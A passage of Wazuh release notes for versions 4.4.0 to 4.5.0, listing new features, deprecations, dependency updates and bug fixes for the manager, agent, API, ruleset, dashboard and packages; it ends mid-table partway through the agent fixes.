Wazuh Kibana plugin for Kibana 7.10.2, 7.16.x, and 7.17.x

Reference

Description

#5471

Fixed the rendering of tables that contain IPs and agent overview.

#5490

Fixed the agents active coverage stat as NaN in Details panel of Agents section.

#5687

Fixed a broken documentation link to agent labels.

#5714

Fixed the PDF report filters applied to tables.

#5766

Fixed outdated year in the PDF report footer.

Changelogs

More details about these changes are provided in the changelog of each component:

4.5.0 Release notes - 10 August 2023

This section lists the changes in version 4.5.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This version includes new features or improvements, such as the following:

Manager
  • #17954 Vulnerability Detector now fetches the NVD feed from https://feed.wazuh.com, based on the NVD API 2.0.

    • The <update_from_year> option has been deprecated.

RESTful API
  • #17703 Modified the API integration tests to include Nginx LB logs in case of test failures.

Resolved issues

This release resolves known issues as the following:

Manager

Reference

Description

#17656

Fixed an error in the installation commands of the API and Framework modules when upgrading from sources.

#18123

Fixed embedded Python interpreter to remove old Wazuh packages from it.

RESTful API

Reference

Description

#17703

Fixed an error in the Nginx LB entrypoint of the API integration tests.

Changelogs

More details about these changes are provided in the changelog of each component:

4.4.5 Release notes - 10 July 2023

This section lists the changes in version 4.4.5. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Resolved issues

This release resolves known issues as the following:

Installer

Reference

Description

#2256

Fixed an error in the DEB packages that prevented the agent and manager from being installed on Debian 12.

#2257

Fixed a service requirement in the RPM packages that prevented the agent and manager from being installed on Oracle Linux 9.

Changelogs

More details about these changes are provided in the changelog of each component:

4.4.4 Release notes - 13 June 2023

This section lists the changes in version 4.4.4. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Agent
  • #17506 The Windows agent package signing certificate has been updated.

Ruleset
  • #17211 Updated all current rule descriptions from "Ossec" to "Wazuh".

Wazuh dashboard
  • #5416 Changed the title and added a warning in step 3 of the Deploy new agent section.

Wazuh Kibana plugin for Kibana 7.10.2
  • #5416 Changed the title and added a warning in step 3 of the Deploy new agent section.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x
  • #5416 Changed the title and added a warning in step 3 of the Deploy new agent section.

Resolved issues

This release resolves known issues as the following:

Wazuh manager

Reference

Description

#17178

The vulnerability scanner stops producing false positives for some Windows 11 vulnerabilities due to a change in the feed's CPE.

#16908

Prevented the VirusTotal integration from querying the API when the source alert misses the MD5.

Changelogs

More details about these changes are provided in the changelog of each component:

4.4.3 Release notes - 25 May 2023

This section lists the changes in version 4.4.3. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Agent
  • #16521 Added support for Apple Silicon processors to the macOS agent.

  • #2211 Prevented the installer from checking the old users ossecm and ossecr on upgrade.

  • #17195 Changed the deployment variables capture on macOS.

Ruleset
  • #17202 Unified the SCA policy names.

Resolved issues

This release resolves known issues as the following:

Agent

Reference

Description

#2217

Removed the temporary file "ossec.confre" after upgrade on macOS.

#2208

Prevented the installer from corrupting the agent configuration on macOS when deployment variables were defined on upgrade.

#2218

Fixed the installation on macOS by removing calls to launchctl.

Wazuh dashboard

Reference

Description

#5481 #5484

Fixed command to install the macOS agent on the agent wizard.

#5470

Fixed command to start the macOS agent on the agent wizard.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#5481 #5484

Fixed command to install the macOS agent on the agent wizard.

#5470

Fixed command to start the macOS agent on the agent wizard.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#5481 #5484

Fixed command to install the macOS agent on the agent wizard.

#5470

Fixed command to start the macOS agent on the agent wizard.

Wazuh Splunk app

Reference

Description

#1407

Fixed macOS agent install and restart command.

Changelogs

More details about these changes are provided in the changelog of each component:

4.4.2 Release notes - 18 May 2023

This section lists the changes in version 4.4.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #15957 Remove an unused variable in wazuh-authd to fix a String not null terminated Coverity finding.

Agent
  • #16515 Added a new module to integrate with Amazon Security Lake as a subscriber.

  • #16847 Added support for localfile blocks deployment.

  • #16743 Changed netstat command on macOS agents.

Ruleset
  • #15566 Added macOS 13.0 Ventura SCA policy.

  • #15567 Added new ruleset for macOS 13 Ventura and older versions.

  • #16549 Added a new base ruleset for log sources collected from Amazon Security Lake.

Other
  • #16692 Added pyarrow and numpy Python dependencies.

  • #16692 Added importlib-metadata and zipp Python dependencies.

  • #17053 Updated Flask Python dependency to 2.2.5.

Resolved issues

This release resolves known issues as the following:

Wazuh manager

Reference

Description

#16394

Fixed a bug causing agent groups tasks status in the cluster not to be stored.

#16478

Fixed memory leaks in Vulnerability Detector after disk failures.

#16530

Fixed a pre-decoder problem with the + symbol in the macOS ULS timestamp.

Agent

Reference

Description

#16517

Fixed an issue with MAC address reporting on Windows systems.

#16857

Fixed Windows unit tests hanging during execution.

RESTful API

Reference

Description

#16381

Fixed agent insertion when no key is specified using POST /agents/insert endpoint.

Wazuh dashboard

Reference

Description

#5428 #5432

Fixed a problem in the backend service to get the plugin configuration.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#5428

Fixed a problem in the backend service to get the plugin configuration.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#5428

Fixed a problem in the backend service to get the plugin configuration.

Changelogs

More details about these changes are provided in the changelog of each component:

4.4.1 Release notes - 12 April 2023

This section lists the changes in version 4.4.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #15883 Improved WazuhDB performance by avoiding synchronizing existing agent keys and removing deprecated agent databases from var/db/agents.

RESTful API
  • #16541 Changed API limits protection to allow uploading new configuration files if limit is not modified.

Ruleset
  • #16017 Added Debian Linux 11 SCA policy.

  • #16016 SCA policy for Red Hat Enterprise Linux 9 rework.

Other
  • #16472 Updated embedded Python interpreter to 3.9.16.

  • #16492 Updated setuptools to 65.5.1.

Packages
  • #2150 The Wazuh dashboard is now based on OpenSearch dashboards 2.6.0.

  • #2150 The Wazuh indexer is now based on OpenSearch 2.6.0.

  • #2147 Added Debian 11 SCA files to specs.

Resolved issues

This release resolves known issues as the following:

Wazuh manager

Reference

Description

#16546

Reverted the addition of some mapping fields in the Wazuh template, causing a bug with expanded search.

Wazuh dashboard

Reference

Description

#5196

Fixed the search in the agent inventory data tables.

#5334

Fixed the Top 5 users table overflow in the FIM dashboard.

#5337

Fixed a visual error in the About section.

#5329

Fixed the Anomaly and malware detection link.

#5341

Fixed an issue that did not allow closing the time picker when pressing the button multiple times in Agents and Management/Statistics.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#5196

Fixed the search in the agent inventory data tables.

#5329

Fixed the Anomaly and malware detection link.

#5341

Fixed an issue that did not allow closing the time picker when pressing the button multiple times in Agents and Management/Statistics.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#5196

Fixed the search in the agent inventory data tables.

#5329

Fixed the Anomaly and malware detection link.

#5341

Fixed an issue that did not allow closing the time picker when pressing the button multiple times in Agents and Management/Statistics.

Changelogs

More details about these changes are provided in the changelog of each component:

4.4.0 Release notes - 28 March 2023

This section lists the changes in version 4.4.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

This new version of Wazuh brings new features and adds support for some Linux distributions and integrations. For more details, the highlights of Wazuh 4.4.0 are listed below:

  • IPv6 support for the enrollment process and the agent-manager connection

  • Vulnerability detection support for SUSE agents

  • Wazuh indexer and dashboard are now based on OpenSearch 2.4.1 version

  • Rework of Ubuntu Linux 20.04 and 22.04 SCA policies

  • Support for Azure Integration in Linux agents

Below you can find more information about each of these highlights.

Wazuh 4.4.0 brings IPv6 support when connecting and enrolling an agent to a manager. The IPv6 protocol can handle packets more effectively, enhance performance, and boost security. This new feature allows agents to register and connect through an IPv6 address.

SUSE agents now natively support vulnerabilities detection. Wazuh added full support for SUSE Linux Enterprise Server and Desktop operating systems versions 11, 12, and 15. The vulnerability Detector now scans the programs identified by syscollector, looking to report vulnerabilities described in the SUSE OVAL and the NVD databases.

Wazuh indexer and dashboard bump to OpenSearch 2.4.1. The Wazuh indexer and the Wazuh dashboard are based on OpenSearch, an open source search and analytics project derived from Elasticsearch and Kibana. We generated and tested the wazuh-indexer Debian and RPM packages with OpenSearch 2.4.1 and the wazuh-dashboard Debian and RPM packages with OpenSearch dashboards 2.4.1. This way, we avoid earlier version vulnerabilities and incorporate new functionalities.

To solve some errors in the previous Ubuntu Linux 20.04 SCA Policy, we reworked the Ubuntu Linux 20.04 and 22.04 SCA policies. As part of this task, we used the CIS Ubuntu Linux 22.04 LTS Benchmark v1.0.0 to update Ubuntu Linux 22.04 SCA Policy.

Wazuh added support for Azure Integration in Linux agents. Now this integration can run for both agents and managers. We modified the packages generation process to support Azure in those agents that are installed using the WPK packages. Each new WPK package contains all the updated binaries and source code, and the installer updates all files and binaries to support Azure integration.

Finally, it’s essential to remark that we maintain support for all installation alternatives. Indeed we maintain and extend this support by adding more recent versions.

Note

Starting with Wazuh v4.5.0, the central components will only support the Amazon Linux, RHEL, CentOS, and Ubuntu operating systems whose versions are officially supported by their vendors. Wazuh agents will maintain their current support status.

Breaking changes

This release includes some breaking changes, such as the following:

Wazuh manager
  • #10865 The agent key polling module has been ported to wazuh-authd.

RESTful API
  • #14119 Added new setting upload_wazuh_configuration to the Wazuh API configuration. The old parameter remote_commands is now part of this setting.

  • #14230 Deprecated GET /manager/stats/analysisd, GET /manager/stats/remoted, GET /cluster/{node_id}stats/analysisd, and GET /cluster/{node_id}stats/remoted API endpoints. Use new endpoints GET /manager/daemons/stats and /cluster/{node_id}/daemons/stats, respectively.

  • #16231 Removed RBAC group assignments' related permissions from DELETE /groups to improve performance and changed response structure.

Ruleset
  • Wazuh ruleset has been updated, and you can check the changes in the following list. If you have a custom set of decoders and rules, please check the changes done.

What's new

This version includes new features or improvements, such as the following:

Wazuh manager
  • #9995 Added new unit tests for cluster Python module and increased coverage to 99%.

  • #11190 Added file size limitation on cluster integrity sync.

  • #13424 Added unittests for CLIs script files.

  • #9962 Added support for SUSE in Vulnerability Detector.

  • #13263 Added support for Ubuntu Jammy in Vulnerability Detector.

  • #13608 Added a software limit to restrict the number of EPS a manager can process.

  • #11753 Added a new wazuh-clusterd task for agent-groups info synchronization.

  • #14950 Added unit tests for functions in charge of getting ruleset sync status.

  • #14950 Added auto-vacuum mechanism in wazuh-db.

  • #10843 Delta events in Syscollector when data gets changed may now produce alerts.

  • #10822 wazuh-logtest now shows warnings about ruleset issues.

  • #12206 Modulesd memory is now managed by jemalloc to help reduce memory fragmentation.

  • #12117 Updated the Vulnerability Detector configuration reporting to include MSU and skip JSON Red Hat feed.

  • #12352 Improved the shared configuration file handling performance.

  • #11753 The agent group data is now natively handled by Wazuh DB.

  • #10710 Improved security at cluster zip filenames creation.

  • #12390 The core/common.py module is refactored.

  • #12497 The format_data_into_dictionary method of WazuhDBQuerySyscheck class is refactored.

  • #11124 The maximum zip size that can be created while synchronizing cluster Integrity is limited.

  • #13065 The functions in charge of synchronizing files in the cluster are refactored.

  • #13079 Changed MD5 hash function to BLAKE2 for cluster file comparison.

  • #12926 Renamed wazuh-logtest and wazuh-clusterd scripts to follow the same scheme as the other scripts (spaces symbolized with _ instead of -).

  • #13741 Added the update field in the CPE Helper for Vulnerability Detector.

  • #11702 The agents with the same ID are prevented from connecting to the manager simultaneously.

  • #13713 wazuh-analysisd, wazuh-remoted, and wazuh-db metrics have been extended.

  • #11753 wazuh-clusterd number of messages are minimized and optimized from workers to master related to agent-info tasks.

  • #14244 The performance of the agent_groups CLI is improved when listing agents belonging to a group.

  • #14475 Changed wazuh-clusterd binary behavior to kill any existing cluster processes when executed.

  • #14791 Changed wazuh-clusterd tasks to wait asynchronously for responses coming from wazuh-db.

  • #11190 Use zlib for zip compression in cluster synchronization.

  • #12241 Added mechanism to dynamically adjust zip size limit in Integrity sync.

  • #12409 Removed the unused internal option wazuh_db.sock_queue_size.

  • #10940 Removed all the unused exceptions from the exceptions.py file.

  • #10740 Removed unused execute method from core/utils.py.

  • #13119 Removed unused set_user_name function in framework.

  • #12370 Unused internal calls to wazuh-db have been deprecated.

  • #14542 Debian Stretch support in Vulnerability Detector has been deprecated.

  • #15853 The status field in SCA is deprecated.

  • #16066 Agent group guessing now writes the new group directly on the master node based on the configuration hash.

  • #16098 Added cascading deletion of membership table entries when deleting a group.

  • #16499 Changed agent_groups CLI output so affected agents are not printed when deleting a group.

Wazuh agent
  • #11756 Added support of CPU frequency data provided by Syscollector on Raspberry Pi.

  • #11450 Added support for IPv6 address collection in the agent.

  • #11833 Added the process startup time data provided by Syscollector on macOS.

  • #11571 Added support for package retrieval in Syscollector for openSUSE Tumbleweed and Fedora 34.

  • #11640 Added the process startup time data provided by Syscollector on macOS.

  • #11796 Added support for package data provided by Syscollector on Solaris.

  • #10843 Added support for delta events in Syscollector when data gets changed.

  • #12035 Added support for pre-installed Windows packages in Syscollector.

  • #11268 Added support for IPv6 on agent-manager connection and enrollment.

  • #12582 Added support for CIS-CAT Pro v3 and v4 to the CIS-CAT integration module.

  • #10870 Added support for using the Azure integration module in Linux agents.

  • #11852 Added new error messages when using invalid credentials with the Azure integration.

  • #12515 Added reparse option to CloudWatchLogs and Google Cloud Storage integrations.

  • #14726 Wazuh Agent can now be built and run on Alpine Linux.

  • #15054 Added native Shuffle integration.

  • #11587 Improved the free RAM data provided by Syscollector.

  • #12752 The Windows installer (MSI) now provides signed DLL files.

  • #12748 Changed the group ownership of the Modulesd process to root.

  • #12750 Some parts of Agentd and Execd were refactored.

  • #10478 Handled new exceptions in the external integration modules.

  • #11828 Optimized the number of calls to DB maintenance tasks performed by the AWS integration.

  • #12404 Improved the reparse setting performance by removing unnecessary queries from external integrations.

  • #12478 Updated and expanded Azure module logging functionality to use the ossec.log file.

  • #12647 Improved the error management of the Google Cloud integration.

  • #12769 The logging tag in GCloud integration is deprecated. It now uses wazuh_modules debug value to set the verbosity level.

  • #12849 The last_dates.json file of the Azure module was deprecated in favor of a new ORM and database.

  • #12929 Improved the error handling in AWS integration's decompress_file method.

  • #11190 The compress/decompress Cluster's methods are now improved. Now we use zlib for zip compression in cluster synchronization.

  • #11354 The exception handling on Wazuh Agent for Windows was changed to DWARF2.

  • #14696 The root CA certificate for WPK upgrade has been updated.

  • #14822 Agents on macOS now report the OS name as "macOS" instead of "Mac OS X".

  • #14816 The Systemd service stopping policy has been updated.

  • #14793 Changed how the AWS module handles ThrottlingException adding default values for connection retries in case no config file is set.

  • #15404 The agent for Windows now verifies its libraries to prevent side loading.

  • #14543 Azure and AWS credentials are deprecated in the configuration authentication option.

RESTful API
  • #10620 Added new API integration tests for a Wazuh environment without a cluster configuration.

  • #11731 Added wazuh-modulesd tags to GET /manager/logs and GET /cluster/{node_id}/logs endpoints.

  • #12438 Added Python decorator to soft deprecate API endpoints adding deprecation headers to their responses.

  • #12486 Added new exception to inform that /proc directory is not found or permissions to see its status are not granted.

  • #12362 Added new field and filter to GET /agents response to retrieve agent groups configuration synchronization status.

  • #12498 Added agent groups configuration synchronization status to GET /agents/summary/status endpoint.

  • #11171 Added JSON log handling.

  • #12029 Added integration tests for IPv6 agent's registration.

  • #12887 Enable ordering count in /groups endpoints by Agents.

  • #12092 Added a hash to API logs to identify users logged in with authorization context.

  • #14295 Added logic to API logger to renew its streams if needed on every request.

  • #14401 Added GET /manager/daemons/stats and GET /cluster/{node_id}/daemons/stats API endpoints.

  • #14464 Added GET /agents/{agent_id}/daemons/stats API endpoint.

  • #14471 Added the possibility to get the configuration of the wazuh-db component in active configuration endpoints.

  • #15084 Added distinct and select parameters to GET /sca/{agent_id} and GET /sca/{agent_id}/checks/{policy_id} endpoints.

  • #15290 Added new endpoint to run vulnerability detector on-demand scans (PUT /vulnerability).

  • #11341 Improved GET /cluster/healthcheck endpoint and cluster_control -i more CLI call in loaded cluster environments.

  • #12551 Changed API version and upgrade_version filters to work with different version formats.

  • #9413 Renamed GET /agents/{agent_id}/group/is_sync endpoint to GET /agents/group/is_sync and added new agents_list parameter.

  • #10397 Added POST /security/user/authenticate endpoint and marked GET /security/user/authenticate endpoint as deprecated.

  • #12526 Adapted framework code to agent-group changes to use the new wazuh-db commands.

  • #13791 Updated default timeout for GET /mitre/software to avoid timing out in slow environments after the MITRE DB update to v11.2.

  • #14119 Changed API settings related to remote commands. The remote_commands section will be held within upload_wazuh_configuration.

  • #14233 Improved API unauthorized responses to be more accurate.

  • #14259 Updated framework functions that communicate with the request socket to use remote instead.

  • #14766 Improved parameter validation for API endpoints that require component and configuration parameters.

  • #15017 Improved GET /sca/{agent_id}/checks/{policy_id} API endpoint performance.

  • #15334 Improved exception handling when connecting to Wazuh sockets.

  • #15671 Modified _group_names and _group_names_or_all regexes to avoid invalid group names.

  • #15747 Changed GET /sca/{agent_id}/checks/{policy_id} endpoint filters and response to remove the status field.

  • #12595 Removed never_connected agent status limitation when assigning agents to groups.

  • #12053 Removed null remediations from failed API responses.

  • #12365 GET /agents/{agent_id}/group/is_sync endpoint is deprecated.

Ruleset
  • #13594 Added support for new sysmon events.

  • #13595 Added new detection rules using Sysmon ID 1 events.

  • #13596 Added new detection rules using Sysmon ID 3 events.

  • #13630 Added new detection rules using Sysmon ID 7 events.

  • #13637 Added new detection rules using Sysmon ID 8 events.

  • #13639 Added new detection rules using Sysmon ID 10 events.

  • #13631 Added new detection rules using Sysmon ID 11 events.

  • #13636 Added new detection rules using Sysmon ID 13 events.

  • #13673 Added new detection rules using Sysmon ID 20 events.

  • #13638 Added new PowerShell ScriptBlock detection rules.

  • #15157 Added HPUX 11i SCA policies using bastille and without bastille.

  • #15072 Updated ruleset according to new API log changes when the user is logged in with authorization context.

  • #13579 Updated 0580-win-security_rules.xml rules.

  • #13622 Updated Wazuh MITRE ATT&CK database to version 11.3.

  • #13633 Updated detection rules in 0840-win_event_channel.xml.

  • #15070 SCA policy for Ubuntu Linux 20.04 rework.

  • #15051 Updated Ubuntu Linux 22.04 SCA Policy with CIS Ubuntu Linux 22.04 LTS Benchmark v1.0.0.

Other
  • #12733 Added unit tests to the component in Analysisd that extracts the IP address from events.

  • #12518 Added python-json-logger dependency.

  • #10773 The Ruleset test suite is prevented from restarting the manager.

  • #14839 The pthread's rwlock was replaced with a FIFO-queueing read-write lock.

  • #15809 Updated Python dependency certifi to 2022.12.7.

  • #15896 Updated Python dependency future to 0.18.3.

  • #16317 Updated Werkzeug to 2.2.3.

  • #16317 Updated Flask to 2.0.0.

  • #16317 Updated itsdangerous to 2.0.0.

  • #16317 Updated Jinja2 to 3.0.0.

  • #16317 Updated MarkupSafe to 2.1.2.

Wazuh dashboard
  • #4323 Added the option to sort by the agents count in the group table.

  • #3874 #5143 #5177 Added agent synchronization status in the agent module.

  • #4739 The input name was added so that when the user adds a value, the variable WAZUH_AGENT_NAME with its value appears in the installation command.

  • #4512 Redesign the SCA table from the agent's dashboard.

  • #4501 The plugin setting description displayed in the UI, and the configuration file are enhanced.

  • #4503 #4785 Added validation to the plugin settings in the form of Settings/Configuration and the endpoint to update the plugin configuration.

  • #4505 #4798 #4805 Added new plugin settings to customize the header and footer on the PDF reports.

  • #4507 Added a new plugin setting to enable or disable the customization.

  • #4504 Added the ability to upload an image for the customization.logo.* settings in Settings/Configuration.

  • #4867 Added macOS version to wizard deploy agent.

  • #4833 Added PowerPC architecture in Red Hat 7, in the section Deploy new agent.

  • #4831 Added a centralized service to handle the requests.

  • #4873 Added data-test-subj create policy.

  • #4933 Added extra steps message and a new command for Windows XP and Windows server 2008, added Alpine agent with all its steps.

  • #4933 Deploy new agent section: Added link for additional steps to Alpine OS.

  • #4970 Added file saving conditions in File Editor.

  • #5021 #5028 Added character validation to avoid invalid agent names in the section Deploy new agent.

  • #5063 Added default selected options in Deploy Agent page.

  • #5166 Added the server address and Wazuh protocol definition in the Deploy new agent section.

  • #4103 Changed the HTTP verb from GET to POST in the requests to login to the Wazuh API.

  • #4376 #5071 5131 Improved alerts summary performance.

  • #4363 #5076 Improved Agents Overview performance.

  • #4529 #4964 Improved the message displayed when a version mismatches between the Wazuh API and the Wazuh APP.

  • #4363 Independently load each dashboard from the Agents Overview page.

  • #3874 The endpoint /agents/summary/status response was adapted.

  • #4458 Updated and added operating systems, versions, architectures commands of Install and enroll the agent and commands of Start the agent in the deploy new agent section.

  • #4776 #4954 Added cluster's IP and protocol as suggestions in the agent deployment wizard.

  • #4851 Show the OS name and OS version in the agent installation wizard.

  • #4501 Changed the endpoint that updates the plugin configuration to support multiple settings.

  • #4985 Updated the winston dependency to 3.5.1.

  • #4985 Updated the pdfmake dependency to 0.2.6.

  • #4992 The button to export the app logs is now disabled when there are no results instead of showing an error toast.

  • #5031 Unify the SCA check result label name.

  • #5062 Updated mocha dependency to 10.1.0.

  • #5062 Updated pdfmake dependency to 0.2.7.

  • #4491 Removed custom styles from Kibana 7.9.0.

  • #4985 Removed the angular-chart.js dependency.

  • #5062 #5089 Remove the pug-loader dependency.

Wazuh Kibana plugin for Kibana 7.10.2
  • #4323 Added the option to sort by the agents count in the group table.

  • #3874 #5143 #5177 Added agent synchronization status in the agent module.

  • #4739 Added the ability to set the name of the agent using the deployment wizard.

  • #4739 The input name was added so that when the user adds a value, the variable WAZUH_AGENT_NAME with its value appears in the installation command.

  • #4512 Redesign the SCA table from the agent's dashboard.

  • #4501 The plugin setting description displayed in the UI, and the configuration file are enhanced.

  • #4503 #4785 Added validation to the plugin settings in the form of Settings/Configuration and the endpoint to update the plugin configuration.

  • #4505 #4798 #4805 Added new plugin settings to customize the header and footer on the PDF reports.

  • #4507 Added a new plugin setting to enable or disable the customization.

  • #4504 Added the ability to upload an image for the customization.logo.* settings in Settings/Configuration.

  • #4867 Added macOS version to wizard deploy agent.

  • #4833 Added PowerPC architecture in Red Hat 7, in the section Deploy new agent.

  • #4831 Added a centralized service to handle the requests.

  • #4873 Added data-test-subj create policy.

  • #4933 Added extra steps message and a new command for Windows XP and Windows Server 2008, added Alpine agent with all its steps.

  • #4933 Deploy new agent section: Added link for additional steps to Alpine os.

  • #4970 Added file saving conditions in File Editor.

  • #5021 #5028 Added character validation to avoid invalid agent names in the section Deploy new agent.

  • #5063 Added default selected options in Deploy Agent page.

  • #5166 Added the server address and Wazuh protocol definition in the Deploy new agent section.

  • #4103 Changed the HTTP verb from GET to POST in the requests to login to the Wazuh API.

  • #4376 #5071 #5131 Improved alerts summary performance.

  • #4363 #5076 Improved Agents Overview performance.

  • #4529 #4964 Improved the message displayed when a version mismatches between the Wazuh API and the Wazuh APP.

  • #4363 Independently load each dashboard from the Agents Overview page.

  • #3874 The endpoint /agents/summary/status response was adapted.

  • #4458 Updated and added operating systems, versions, architectures commands of Install and enroll the agent and commands of Start the agent in the deploy new agent section.

  • #4776 #4954 Added cluster's IP and protocol as suggestions in the agent deployment wizard.

  • #4851 Show the OS name and OS version in the agent installation wizard.

  • #4501 Changed the endpoint that updates the plugin configuration to support multiple settings.

  • #4985 Updated the winston dependency to 3.5.1.

  • #4992 The button to export the app logs is now disabled when there are no results, instead of showing an error toast.

  • #5062 Updated mocha dependency to 10.1.0.

  • #5031 Unify the SCA check result label name.

  • #5014 Removed the angular-chart.js dependency.

  • #5062 Removed the pug-loader dependency.

  • #5102 Removed unused file related to agent menu.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x
  • #4323 Added the option to sort by the agents count in the group table.

  • #3874 #5143 #5177 Added agent synchronization status in the agent module.

  • #4739 The input name was added so that when the user adds a value, the variable WAZUH_AGENT_NAME with its value appears in the installation command.

  • #4512 Redesign the SCA table from the agent's dashboard.

  • #4501 The plugin setting description displayed in the UI, and the configuration file are enhanced.

  • #4503 #4785 Added validation to the plugin settings in the form of Settings/Configuration and the endpoint to update the plugin configuration.

  • #4505 #4798 #4805 Added new plugin settings to customize the header and footer on the PDF reports.

  • #4507 Added a new plugin setting to enable or disable the customization.

  • #4504 Added the ability to upload an image for the customization.logo.* settings in Settings/Configuration.

  • #4867 Added macOS version to wizard deploy agent.

  • #4833 Added PowerPC architecture in Red Hat 7, in the section Deploy new agent.

  • #4831 Added a centralized service to handle the requests.

  • #4873 Added data-test-subj create policy.

  • #4933 Added extra steps message and a new command for Windows XP and Windows server 2008, added Alpine agent with all its steps.

  • #4933 Deploy new agent section: Added link for additional steps to Alpine os.

  • #4970 Added file saving conditions in File Editor.

  • #5021 #5028 Added character validation to avoid invalid agent names in the section Deploy new agent.

  • #5063 Added default selected options in Deploy Agent page.

  • #5166 Added the server address and Wazuh protocol definition in the Deploy new agent section.

  • #4103 Changed the HTTP verb from GET to POST in the requests to login to the Wazuh API.

  • #4376 #5071 #5131 Improved alerts summary performance.

  • #4363 #5076 Improved Agents Overview performance.

  • #4529 #4964 Improved the message displayed when a version mismatches between the Wazuh API and the Wazuh APP.

  • #4363 Independently load each dashboard from the Agents Overview page.

  • #3874 The endpoint /agents/summary/status response was adapted.

  • #4458 Updated and added operating systems, versions, architectures commands of Install and enroll the agent and commands of Start the agent in the deploy new agent section.

  • #4776 #4954 Added cluster's IP and protocol as suggestions in the agent deployment wizard.

  • #4851 Show the OS name and OS version in the agent installation wizard.

  • #4501 Changed the endpoint that updates the plugin configuration to support multiple settings.

  • #4972 The button to export the app logs is now disabled when there are no results instead of showing an error toast.

  • #4985 Updated the winston dependency to 3.5.1.

  • #4985 Updated the pdfmake dependency to 0.2.6.

  • #4992 The button to export the app logs is now disabled when there are no results instead of showing an error toast.

  • #5062 Updated mocha dependency to 10.1.0.

  • #5062 Updated pdfmake dependency to 0.2.7.

  • #5031 Unify the SCA check result label name.

  • #4985 Removed the angular-chart.js dependency.

  • #5062 Removed the pug-loader dependency.

  • #5103 Removed unused file related to agent menu.

Wazuh Splunk app
  • #1355 Added agent's synchronization statistics.

  • #1355 Updated the response handlers for the /agents/summary/status endpoint.

Packages
  • #1980 The Wazuh dashboard is now based on OpenSearch dashboards 2.4.1.

  • #1979 The Wazuh indexer is now based on OpenSearch 2.4.1.

  • #1715 Added the Alpine package build.

  • #1770 The wazuh-certs-tool.sh now supports multiple IP addresses for each node.

  • #1167 Added the Azure wodle files to the Solaris 11 and RPM agent SPEC files.

  • #1379 Added the new wodles/gcloud files and folders to the Solaris 11 SPEC file.

  • #1453 Added orm.py to the Solaris 11 SPEC file.

  • #1299 Applied the changes required for the new agent-group mechanism.

  • #1569 Removed unnecessary plugins from the default Wazuh dashboard.

  • #1602 Simplified the Splunk packages builder.

  • #1687 Installed open-vm-tools in the OVA.

  • #1699 Added a custom path option for the Wazuh indexer packages.

  • #1751 Updated the Wazuh dashboard loading screen.

  • #1823 The indexer-security-init.sh now accepts DNS names as network hosts.

  • #1154 The Wazuh passwords tool is now able to obtain the IP address of an interface from the configuration file.

  • #1839 The Wazuh installation assistant now uses apt-get instead of apt.

  • #1831 The base creation is now integrated within the build_packages.sh script.

  • #1838 Changed the internal directory in the base container.

  • #1473 Changed method from GET to POST in the API login requests.

  • #1882 Added changes to distribute the libstdc++ and libgcc_s to wazuh-packages.

  • #1890 Updated permissions in the Wazuh indexer and Wazuh dashboard.

  • #1876 Removed the deprecated apt-key utility from the Wazuh installation assistant.

  • #1904 Parameterized the Wazuh dashboard script.

  • #1929 Added the Wazuh dashboard light loading screen logo in dark mode.

  • #1930 Added the Distribution version matrix section in the wazuh-packages README.md file.

  • #1961 Added ossec.conf file generation and improved SPECs on the Alpine packages.

  • #1343 Signed the Windows dynamic link library files.

Resolved issues

This release resolves known issues, such as the following:

Wazuh manager

Reference

Description

#10873

Fixed wazuh-dbd halt procedure.

#12098

Fixed compilation warnings in the manager.

#12516

Fixed a bug in the manager that did not send shared folders correctly to agents belonging to multiple groups.

#12834

Fixed the Active Response decoders to support back the top entries for source IP in reports.

#13338

Fixed the feed update interval option of Vulnerability Detector for the JSON Red Hat feed.

#12127

Fixed several code flaws in the Python framework.

#10635

Fixed code flaw regarding the use of XML package.

#10636

Fixed code flaw regarding permissions at group directories.

#10544

Fixed code flaw regarding temporary directory names.

#11951

Fixed code flaw regarding try, except and pass code block in wazuh-clusterd.

#10782

Fixed framework datetime transformations to UTC.

#11866

Fixed a cluster error when Master-Worker tasks were not properly stopped after an exception occurred in one or both parts.

#12831

Fixed cluster logger issue printing NoneType: None in error logs.

#13419

Fixed unhandled cluster error when reading a malformed configuration.

#13368

Fixed framework unit test failures when run by the root user.

#13405

Fixed a memory leak in analysisd when parsing a disabled Active Response.

#13892

wazuh-db is prevented from deleting queue/diff when cleaning databases.

#14981

Fixed multiple data race conditions in Remoted reported by ThreadSanitizer.

#15151

Fixed aarch64 OS collection in Remoted to allow WPK upgrades.

#15165

Fixed a race condition in Remoted that was blocking agent connections.

#13531

Fixed Virustotal integration to support non UTF-8 characters.

#14922

Fixed a bug masking as Timeout any error that might occur while waiting to receive files in the cluster.

#15876

Fixed a read buffer overflow in wazuh-authd when parsing requests.

#16012

Applied workaround for bpo-46309 used in a cluster to wazuh-db communication.

#16233

Let the database module synchronize the agent group data before assignments.

#16321

Fixed memory leaks in wazuh-analysisd when parsing and matching rules.

Wazuh agent

Reference

Description

#7687

Fixed collection of maximum user data length.

#10772

Fixed missing fields in Syscollector on Windows 10.

#11227

Fixed the process startup time data provided by Syscollector on Linux.

#11837

Fixed network data reporting by Syscollector related to tunnel or VPN interfaces.

#12066

V9FS file system is skipped at Rootcheck to prevent false positives on WSL.

#9067

Fixed double file handle closing in Logcollector on Windows.

#11949

Fixed a bug in Syscollector that may prevent the agent from stopping when the manager connection is lost.

#12148

Fixed internal exception handling issues on Solaris 10.

#12300

